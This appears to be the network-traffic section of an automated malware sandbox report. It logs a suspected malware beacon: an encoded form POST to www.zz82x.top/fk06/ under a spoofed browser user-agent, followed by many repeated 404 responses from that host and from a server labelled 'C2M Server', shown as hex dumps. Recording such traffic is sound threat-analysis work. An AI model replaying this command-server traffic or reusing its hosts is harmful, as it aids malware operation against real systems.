Source: unknown | HTTP traffic detected: POST /fk06/ HTTP/1.1 | Host: www.zz82x.top | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 | Accept-Language: en-US,en;q=0.9 | Accept-Encoding: gzip, deflate, br | Origin: http://www.zz82x.top | Connection: close | Content-Length: 205 | Cache-Control: max-age=0 | Content-Type: application/x-www-form-urlencoded | Referer: http://www.zz82x.top/fk06/ | User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) | Data Raw: 31 5a 71 44 3d 33 77 79 47 57 4a 61 35 30 65 4a 36 6c 62 56 69 6d 6e 38 68 42 6a 73 55 55 78 35 4c 44 4a 43 4c 6c 52 6f 38 43 67 42 69 56 79 75 34 51 56 75 63 66 51 74 73 58 7a 62 43 6a 6a 45 33 63 4d 69 78 4a 32 2b 65 38 6f 2b 4e 42 51 30 77 79 52 4a 70 74 33 61 38 73 74 6a 76 4c 69 4b 50 2b 5a 4b 39 62 70 34 6f 38 6b 4e 36 46 4d 6c 78 55 52 2b 42 6d 6f 73 52 50 51 57 58 35 52 73 75 6b 41 73 45 56 70 2f 5a 74 74 31 78 2f 41 48 5a 6d 71 72 69 49 48 51 43 63 65 6a 38 57 5a 4b 68 4f 66 79 59 31 4a 67 39 36 51 54 4f 56 61 62 7a 49 70 69 4f 4f 6b 38 54 46 4b 6b 78 50 59 6c 68 48 36 4c 36 6d 6b 57 6d 65 7a 4d 3d | Data Ascii: 1ZqD=3wyGWJa50eJ6lbVimn8hBjsUUx5LDJCLlRo8CgBiVyu4QVucfQtsXzbCjjE3cMixJ2+e8o+NBQ0wyRJpt3a8stjvLiKP+ZK9bp4o8kN6FMlxUR+BmosRPQWX5RsukAsEVp/Ztt1x/AHZmqriIHQCcej8WZKhOfyY1Jg96QTOVabzIpiOOk8TFKkxPYlhH6L6mkWmezM=
Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Content-Type: text/html | Transfer-Encoding: chunked | Connection: close | Date: Sat, 11 Jan 2025 05:32:14 GMT | Server: Apache | X-Frame-Options: deny | Content-Encoding: gzip | Data Raw: 32 33 39 0d 0a 1f 8b 08 00 00 00 00 00 00 03 85 54 4d 6f d3 40 10 bd f7 57 4c 8d 50 40 c4 71 7a 43 89 dd 03 b4 54 20 a8 2b 35 12 42 e2 b2 f6 8e ed 69 ed dd 68 77 9d 0f 10 ff 9d f1 3a 91 12 e2 92 5c a2 9d 8f f7 76 df 9b 71 7c 79 93 7e 5c fc 78 b8 85 ca 35 f5 f5 45 dc ff 41 5c a1 90 d7 17 00 71 83 4e 40 5e 09 63 d1 25 41 eb 8a f0 7d e0 13 d6 6d 6b 04 b7 5d 62 12 38 dc b8 28 b7 d6 67 3c d4 18 32 2d b7 63 78 b5 14 c6 29 34 63 a0 c2 88 06 e1 37 83 1e ff 2a a4 b2 72 b3 ab e9 f4 f5 fc 24 b9 26 e9 aa 17 72 8d 30 25 a9 d9 f4 b4 6b 29 a4 24 55 0e a5 32 6d 24 9a a1 8c 6e 5d 4d 0a 87 52 85 56 2e b4 f4 0b 5f b8 c9 0a 8d a3 5c d4 a1 a8 a9 54 b3 4c 58 ec a0 4e 2f 96 89 fc b9 34 ba 55 72 e6 8c 50 96 d5 41 e5 8e eb fe 1c 89 d0 c9 38 20 9a 66 ca a2 d6 eb 59 45 52 a2 3a 45 88 23 6f d0 81 87 fc 06 e6 4a 82 fb f4 7b 00 8a bd 48 02 dc 2c c9 60 6f db ce e9 7d 15 29 89 9b 31 14 ba 66 96 31 88 ba de 37 dd a5 e9 dd d7 db 0f e9 a2 9f 83 7e 40 ce b7 19 9d 69 b7 a3 ba 0c 43 f8 e4 91 d9 25 f8 c6 23 16 2e 44 09 05 6d d0 82 65 21 39 1c 92 b5 2d 1f b5 82 46 67 c4 b3 26 71 45 39 47 c2 70 e0 55 7e 50 92 be 24 f4 87 39 90 22 47 ec 4a 87 88 c9 d5 64 3a 87 46 6c a8 69 9b c3 50 6b d1 f8 b3 c8 b8 6a 3a df bf 73 45 b8 5e 6a e3 ba 67 c6 d1 6e 21 e2 ce 0f 4f 2f 69 05 24 93 60 37 e0 bd 18 11 47 7d d6 e6 86 96 ee 70 3d 9e c4 4a f4 d1 7e 4b a4 ce db 86 0d 99 ac 0d 39 7c 73 64 fa 7e 41 46 f1 7f 71 a0 16 aa 6c 45 c9 4e 7e 61 f4 47 cf 19 8c 06 a1 f6 90 ef 60 64 4d 9e 04 51 64 51 6a be fc 33 6b 3d c9 75 13 15 a6 e9 8e d1 b9 fe 35 8f 86 5e 4f 6a 9d 0b 47 5a 4d 2a 6d 1d 30 ec d9 c6 d1 e7 f4 3e 7d 7c e8 29 6f 6e cf f1 8c a2 ee 3a 93 27 9e 99 e1 52 e6 8c 7f 46 bd 42 ff 94 bc ed 16 82 57 c0 2b e2 fd eb 7d 63 1f bb ef dc 5f 9d a7 e3 e7 f7 04 00 00 0d 0a 30 0d 0a 0d 0a (a single chunk of 0x239 = 569 bytes of gzip data followed by the terminating zero-length chunk; the report's ASCII rendering of the compressed body is unreadable and is omitted here)
Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Content-Type: text/html | Transfer-Encoding: chunked | Connection: close | Date: Sat, 11 Jan 2025 05:32:16 GMT | Server: Apache | X-Frame-Options: deny | Content-Encoding: gzip | Data Raw: byte-identical to the 05:32:14 response above
Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Content-Type: text/html | Transfer-Encoding: chunked | Connection: close | Date: Sat, 11 Jan 2025 05:32:19 GMT | Server: Apache | X-Frame-Options: deny | Content-Encoding: gzip | Data Raw: byte-identical to the 05:32:14 response above
Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Content-Type: text/html | Content-Length: 1271 | Connection: close | Date: Sat, 11 Jan 2025 05:32:22 GMT | Server: Apache | X-Frame-Options: deny | Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 68 74 6d 6c 2c 20 62 6f 64 79 2c 20 23 70 61 72 74 6e 65 72 2c 20 69 66 72 61 6d 65 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3a 31 30 30 25 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3a 31 30 30 25 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 72 64 65 72 3a 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6f 75 74 6c 69 6e 65 3a 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 30 30 25 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 76 65 72 74 69 63 61 6c 2d 61 6c 69 67 6e 3a 62 61 73 65 6c 69 6e 65 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 74 72 61 6e 73 70 61 72 65 6e 74 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 3c 2f 73 74 79 6c 65 3e 0a 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 4e 4f 57 22 20 6e 61 6d 65 3d 22 65 78 70 69 72 65 73 22 3e 0a 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 64 65 78 2c 20 66 6f 6c 6c 6f 77 2c 20 61 6c 6c 22 20 6e 61 6d 65 3d 22 47 4f 4f 47 4c 45 42 4f 54 22 3e 0a 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 64 65 78 2c 20 66 6f 6c 6c 6f 77 2c 20 61 6c 6c 22 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 3e 0a 20 20 3c 21 2d 2d 20 46 6f 6c 6c 6f 77 69 6e 67 20 4d 65 74 61 2d 54 61 67 20 66 69 78 65 73 20 73 63 61 6c 69 6e 67 2d 69 73 73 75 65 73 20 6f 6e 20 6d 6f 62 69 6c 65 20 64 65 76 69 63 65 73 20 2d 2d 3e 0a 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 3b 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 3b 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2e 30 3b 20 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 30 3b 22 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 3e 0a 20 3c 2f 68 65 61 64 3e 0a 20 3c 62 6f 64 79 3e 0a 20 20 3c 64 69 76 20 69 64 3d 22 70 61 72 74 6e 65 72 22 3e 0a 20 20 3c 2f 64 69 76 3e 0a 20 20 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 20 20 20 64 6f 63 75 6d 65 6e 74 2e 77 72 69 74 65 28 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 27 3c 73 63 72 69 70 74 20 74 79 70 65 3d 2 (dump truncated in the report) | Data Ascii (decoded here from the hex above, cut off where the dump is): <!DOCTYPE html><html> <head> <meta charset="utf-8"> <style type="text/css"> html, body, #partner, iframe { height:100%; width:100%; margin:0; padding:0; border:0; outline:0; font-size:100%; vertical-align:baseline; background:transparent; } body { overflow:hidden; } </style> <meta content="NOW" name="expires"> <meta content="index, follow, all" name="GOOGLEBOT"> <meta content="index, follow, all" name="robots"> <!-- Following Meta-Tag fixes scaling-issues on mobile devices --> <meta content="width=device-width; initial-scale=1.0; maximum-scale=1.0; user-scalable=0;" name="viewport"> </head> <body> <div id="partner"> </div> <script type="text/javascript"> document.write( '<script type=
Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Content-Type: text/html; charset=iso-8859-1 | Content-Length: 282 | Accept-Ranges: bytes | Date: Sat, 11 Jan 2025 05:55:42 GMT | X-Varnish: 1719142264 | Age: 0 | Via: 1.1 varnish | Connection: close | X-Varnish-Cache: MISS | Server: C2M Server v1.02 | Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 71 6a 38 79 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 37 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 6e 67 6d 72 2e 78 79 7a 20 50 6f 72 74 20 38 30 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a | Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /qj8y/ was not found on this server.</p><hr><address>Apache/2.4.7 (Ubuntu) Server at www.ngmr.xyz Port 8080</address></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=iso-8859-1Content-Length: 282Accept-Ranges: bytesDate: Sat, 11 Jan 2025 05:55:45 GMTX-Varnish: 1719142286Age: 0Via: 1.1 varnishConnection: closeX-Varnish-Cache: MISSServer: C2M Server v1.02Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 71 6a 38 79 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 37 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 6e 67 6d 72 2e 78 79 7a 20 50 6f 72 74 20 38 30 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /qj8y/ was not found on this server.</p><hr><address>Apache/2.4.7 (Ubuntu) Server at www.ngmr.xyz Port 8080</address></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=iso-8859-1Content-Length: 282Accept-Ranges: bytesDate: Sat, 11 Jan 2025 05:55:47 GMTX-Varnish: 1719142305Age: 0Via: 1.1 varnishConnection: closeX-Varnish-Cache: MISSServer: C2M Server v1.02Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 71 6a 38 79 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 37 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 6e 67 6d 72 2e 78 79 7a 20 50 6f 72 74 20 38 30 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /qj8y/ was not found on this server.</p><hr><address>Apache/2.4.7 (Ubuntu) Server at www.ngmr.xyz Port 8080</address></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=iso-8859-1Content-Length: 282Accept-Ranges: bytesDate: Sat, 11 Jan 2025 05:55:50 GMTX-Varnish: 1719142311Age: 0Via: 1.1 varnishConnection: closeX-Varnish-Cache: MISSServer: C2M Server v1.02Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 71 6a 38 79 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 37 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 6e 67 6d 72 2e 78 79 7a 20 50 6f 72 74 20 38 30 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /qj8y/ was not found on this server.</p><hr><address>Apache/2.4.7 (Ubuntu) Server at www.ngmr.xyz Port 8080</address></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: openrestyDate: Sat, 11 Jan 2025 05:32:42 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingStatus: 404 Not FoundX-Frame-Options: SAMEORIGINX-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffCache-Control: no-cacheX-Request-Id: 5e9bfc8ea0ff8853fd2beccdb4380833X-Runtime: 0.061585Content-Encoding: gzipData Raw: 34 31 32 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b5 56 4b 6f db 38 10 be f7 57 4c 7d 58 da 1b 3d e2 20 ed 02 b1 e5 22 69 b3 45 80 4d 52 b4 0d f6 60 18 05 2d 8d 65 26 14 a9 25 29 3b da 24 ff bd 43 49 7e 24 e9 61 2f eb 83 45 ce 7c c3 79 f0 9b 91 c6 4b 57 c8 c9 1b 80 f1 12 79 e6 17 b4 74 c2 49 9c 7c e1 39 82 d2 0e 16 ba 52 19 84 f0 cd 19 71 27 54 2e eb 71 dc 42 5a 78 81 8e 83 c8 92 de 4a e0 ba d4 c6 f5 40 f1 02 f7 f7 a9 56 0e 95 4b 7a 6b 91 b9 65 92 e1 4a a4 18 36 9b 00 84 12 4e 70 19 da 94 4b 4c 86 d1 61 00 05 bf 17 45 55 ec 44 3d 88 3b 6f 52 a8 3b 58 1a 5c 24 6c e9 5c 69 4f e2 78 41 a7 db 28 d7 3a 97 c8 4b 61 a3 54 17 71 6a ed 87 05 2f 84 ac 93 4b af 47 63 b8 7b bc 2e 51 1d 7c e3 ca 32 30 28 13 66 5d 2d d1 2e 11 1d 03 57 97 98 30 87 f7 ce 1b b3 d7 fe e2 98 5b 8b e4 ca 6e 2b d1 b8 6a a5 f1 f1 e1 71 d8 9e 17 79 fb ff ea e0 6d 18 4e c5 02 a4 43 b8 38 87 3f 66 ad 98 14 8d e9 66 07 10 51 b9 10 1e a0 e4 59 46 be 43 a7 cb 13 18 be 3f 2c ef 47 f0 b4 b1 89 f7 8c c6 6f a7 a8 32 b1 98 85 61 27 b0 a9 11 a5 6b e3 e8 35 71 dc f2 15 6f a5 bd 16 13 c7 f0 b9 29 24 9c 2a 2e 6b 27 52 db c8 fb 8b 4a a5 4e 68 d5 17 81 0d 74 90 07 26 e0 41 31 78 10 53 d6 1a 6c f1 d7 f3 5b 4c 1d 9b 25 66 24 a6 66 96 f8 bf c7 c7 ad fd e0 a1 0b b6 ef 15 d1 3f 49 fb 78 7c 9c ce 06 51 59 d9 65 9f 9b bc 2a 88 2e 76 f0 14 34 4a 99 0c 7f 57 b8 86 4f dc 61 7f 30 e2 09 55 d8 20 6d ce 25 7a 60 5f 0f 82 ee d0 82 74 39 ba 4e 61 cf ea ef 3c bf 22 36 12 64 7a 38 1b f1 88 db 5a a5 c9 90 56 d6 a4 49 3e 2a a2 92 1b 82 5e e9 0c 23 a1 88 27 ee 0c 17 da 60 df a7 d7 9d fa 34 
e8 af 85 ca f4 3a c8 74 da c4 16 b0 b6 6c 2c 20 5a ac d7 eb 8e 7e 21 df 54 a1 65 c6 76 77 6b 09 99 73 36 18 bd e9 ce cc 79 9f b5 59 b0 00 d8 cd 69 78 f4 6e 78 74 4c bf f0 bd 17 f0 ca 69 8f de 81 89 64 8d 42 69 55 17 e2 5f bc 28 69 eb 4c 85 2f 50 2a f3 b0 92 da d7 37 20 ad 1f 9e 1b 9d 34 46 94 d3 68 73 e3 e7 d4 df bf bc 75 e2 53 93 65 33 21 e2 cd 88 18 cf 75 56 77 94 ca c4 0a 52 49 1d 90 b0 79 1e 4a 9d 6b 36 19 c7 24 7d ad 6f f8 2b 45 be 74 a1 e7 1e db 12 7d 0f 93 6a 79 c4 76 9c 1f 2f 87 13 f8 72 fa f9 1c ae ae bf c3 9f d7 37 57 9f 22 8a 63 b8 87 28 27 67 95 03 6a a0 5a 57 cc 90 03 ad 7d 6b 82 d3 30 af 84 cc bc dc 80 5e 2b 58 e3 dc 0a 87 01 c5 6f e2 89 87 af 90 26 53 81 1e eb 96 08 c6 c7 06 a5 e4 29 92 97 72 df 49 17 5f 6f 5e 39 a7 95 ed ed 74 a4 e5 db 0a 34 5a c8 b8 b9 0b e7 39 7b 31 a6 3c 4b 5e 4c 8e 0f 95 2b 7e 58 0a 30 c5 84 c6 c7 6f 7e 5b 60 26 aa 22 11 34 31 0d 5d 46 23 Data Ascii: 412VKo8WL}X= "iEMR`-e&%);$CI~$a/E|yKWytI|9Rq'T.qBZx
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: openrestyDate: Sat, 11 Jan 2025 05:32:44 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingStatus: 404 Not FoundX-Frame-Options: SAMEORIGINX-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffCache-Control: no-cacheX-Request-Id: 332091dbd504ab19ca6a74e331d4f33eX-Runtime: 0.025505Content-Encoding: gzipData Raw: 34 31 32 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b5 56 4b 6f db 38 10 be f7 57 4c 7d 58 da 1b 3d e2 20 ed 02 b1 e5 22 69 b3 45 80 4d 52 b4 0d f6 60 18 05 2d 8d 65 26 14 a9 25 29 3b da 24 ff bd 43 49 7e 24 e9 61 2f eb 83 45 ce 7c c3 79 f0 9b 91 c6 4b 57 c8 c9 1b 80 f1 12 79 e6 17 b4 74 c2 49 9c 7c e1 39 82 d2 0e 16 ba 52 19 84 f0 cd 19 71 27 54 2e eb 71 dc 42 5a 78 81 8e 83 c8 92 de 4a e0 ba d4 c6 f5 40 f1 02 f7 f7 a9 56 0e 95 4b 7a 6b 91 b9 65 92 e1 4a a4 18 36 9b 00 84 12 4e 70 19 da 94 4b 4c 86 d1 61 00 05 bf 17 45 55 ec 44 3d 88 3b 6f 52 a8 3b 58 1a 5c 24 6c e9 5c 69 4f e2 78 41 a7 db 28 d7 3a 97 c8 4b 61 a3 54 17 71 6a ed 87 05 2f 84 ac 93 4b af 47 63 b8 7b bc 2e 51 1d 7c e3 ca 32 30 28 13 66 5d 2d d1 2e 11 1d 03 57 97 98 30 87 f7 ce 1b b3 d7 fe e2 98 5b 8b e4 ca 6e 2b d1 b8 6a a5 f1 f1 e1 71 d8 9e 17 79 fb ff ea e0 6d 18 4e c5 02 a4 43 b8 38 87 3f 66 ad 98 14 8d e9 66 07 10 51 b9 10 1e a0 e4 59 46 be 43 a7 cb 13 18 be 3f 2c ef 47 f0 b4 b1 89 f7 8c c6 6f a7 a8 32 b1 98 85 61 27 b0 a9 11 a5 6b e3 e8 35 71 dc f2 15 6f a5 bd 16 13 c7 f0 b9 29 24 9c 2a 2e 6b 27 52 db c8 fb 8b 4a a5 4e 68 d5 17 81 0d 74 90 07 26 e0 41 31 78 10 53 d6 1a 6c f1 d7 f3 5b 4c 1d 9b 25 66 24 a6 66 96 f8 bf c7 c7 ad fd e0 a1 0b b6 ef 15 d1 3f 49 fb 78 7c 9c ce 06 51 59 d9 65 9f 9b bc 2a 88 2e 76 f0 14 34 4a 99 0c 7f 57 b8 86 4f dc 61 7f 30 e2 09 55 d8 20 6d ce 25 7a 60 5f 0f 82 ee d0 82 74 39 ba 4e 61 cf ea ef 3c bf 22 36 12 64 7a 38 1b f1 88 db 5a a5 c9 90 56 d6 a4 49 3e 2a a2 92 1b 82 5e e9 0c 23 a1 88 27 ee 0c 17 da 60 df a7 d7 9d fa 34 
e8 af 85 ca f4 3a c8 74 da c4 16 b0 b6 6c 2c 20 5a ac d7 eb 8e 7e 21 df 54 a1 65 c6 76 77 6b 09 99 73 36 18 bd e9 ce cc 79 9f b5 59 b0 00 d8 cd 69 78 f4 6e 78 74 4c bf f0 bd 17 f0 ca 69 8f de 81 89 64 8d 42 69 55 17 e2 5f bc 28 69 eb 4c 85 2f 50 2a f3 b0 92 da d7 37 20 ad 1f 9e 1b 9d 34 46 94 d3 68 73 e3 e7 d4 df bf bc 75 e2 53 93 65 33 21 e2 cd 88 18 cf 75 56 77 94 ca c4 0a 52 49 1d 90 b0 79 1e 4a 9d 6b 36 19 c7 24 7d ad 6f f8 2b 45 be 74 a1 e7 1e db 12 7d 0f 93 6a 79 c4 76 9c 1f 2f 87 13 f8 72 fa f9 1c ae ae bf c3 9f d7 37 57 9f 22 8a 63 b8 87 28 27 67 95 03 6a a0 5a 57 cc 90 03 ad 7d 6b 82 d3 30 af 84 cc bc dc 80 5e 2b 58 e3 dc 0a 87 01 c5 6f e2 89 87 af 90 26 53 81 1e eb 96 08 c6 c7 06 a5 e4 29 92 97 72 df 49 17 5f 6f 5e 39 a7 95 ed ed 74 a4 e5 db 0a 34 5a c8 b8 b9 0b e7 39 7b 31 a6 3c 4b 5e 4c 8e 0f 95 2b 7e 58 0a 30 c5 84 c6 c7 6f 7e 5b 60 26 aa 22 11 34 31 0d 5d 46 23 Data Ascii: 412VKo8WL}X= "iEMR`-e&%);$CI~$a/E|yKWytI|9Rq'T.qBZx
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: openrestyDate: Sat, 11 Jan 2025 05:32:47 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingStatus: 404 Not FoundX-Frame-Options: SAMEORIGINX-XSS-Protection: 1; mode=blockX-Content-Type-Options: nosniffCache-Control: no-cacheX-Request-Id: 4142429651ce0a3142f157486796473dX-Runtime: 0.043565Content-Encoding: gzipData Raw: 34 31 32 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b5 56 4b 6f db 38 10 be f7 57 4c 7d 58 da 1b 3d e2 20 ed 02 b1 e5 22 69 b3 45 80 4d 52 b4 0d f6 60 18 05 2d 8d 65 26 14 a9 25 29 3b da 24 ff bd 43 49 7e 24 e9 61 2f eb 83 45 ce 7c c3 79 f0 9b 91 c6 4b 57 c8 c9 1b 80 f1 12 79 e6 17 b4 74 c2 49 9c 7c e1 39 82 d2 0e 16 ba 52 19 84 f0 cd 19 71 27 54 2e eb 71 dc 42 5a 78 81 8e 83 c8 92 de 4a e0 ba d4 c6 f5 40 f1 02 f7 f7 a9 56 0e 95 4b 7a 6b 91 b9 65 92 e1 4a a4 18 36 9b 00 84 12 4e 70 19 da 94 4b 4c 86 d1 61 00 05 bf 17 45 55 ec 44 3d 88 3b 6f 52 a8 3b 58 1a 5c 24 6c e9 5c 69 4f e2 78 41 a7 db 28 d7 3a 97 c8 4b 61 a3 54 17 71 6a ed 87 05 2f 84 ac 93 4b af 47 63 b8 7b bc 2e 51 1d 7c e3 ca 32 30 28 13 66 5d 2d d1 2e 11 1d 03 57 97 98 30 87 f7 ce 1b b3 d7 fe e2 98 5b 8b e4 ca 6e 2b d1 b8 6a a5 f1 f1 e1 71 d8 9e 17 79 fb ff ea e0 6d 18 4e c5 02 a4 43 b8 38 87 3f 66 ad 98 14 8d e9 66 07 10 51 b9 10 1e a0 e4 59 46 be 43 a7 cb 13 18 be 